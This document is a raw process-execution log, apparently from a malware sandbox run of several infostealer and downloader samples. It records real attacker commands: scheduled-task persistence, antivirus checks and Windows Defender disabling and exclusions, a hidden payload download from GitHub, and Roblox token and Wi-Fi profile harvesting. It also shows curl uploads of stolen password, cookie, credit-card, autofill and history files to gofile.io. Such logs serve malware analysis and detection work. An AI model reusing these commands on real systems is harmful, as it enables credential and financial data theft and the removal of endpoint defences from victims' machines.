"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"
C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe
"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfc29cc40,0x7ffdfc29cc4c,0x7ffdfc29cc58
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --disable-http2 --use-spdy=off --disable-quic
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2068 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=2144 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=2780 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5516 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=3732 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35
C:\Windows\system32\mode.com
mode con: cols=125 lines=35
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get UUID
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\t.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 812297
C:\Windows\SysWOW64\findstr.exe
findstr /V "IndieBeachesHonIo" Janet
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
812297\Shopzilla.pif 812297\g
C:\Windows\SysWOW64\timeout.exe
timeout 15
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\shost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\3076928777.exe
C:\Users\Admin\AppData\Local\Temp\3076928777.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\qhos.exe"
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\QuizPokemon.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 812297
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
812297\Shopzilla.pif 812297\g
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 15
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\center.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\phost.exe'
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F7D.tmp\9F7E.tmp\9F7F.bat "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\in.exe""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004D8
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfbs1blz\xfbs1blz.cmdline"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD2.tmp" "c:\Users\Admin\AppData\Local\Temp\xfbs1blz\CSC6F1275C1466A4B1FB51355725463AB7.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe
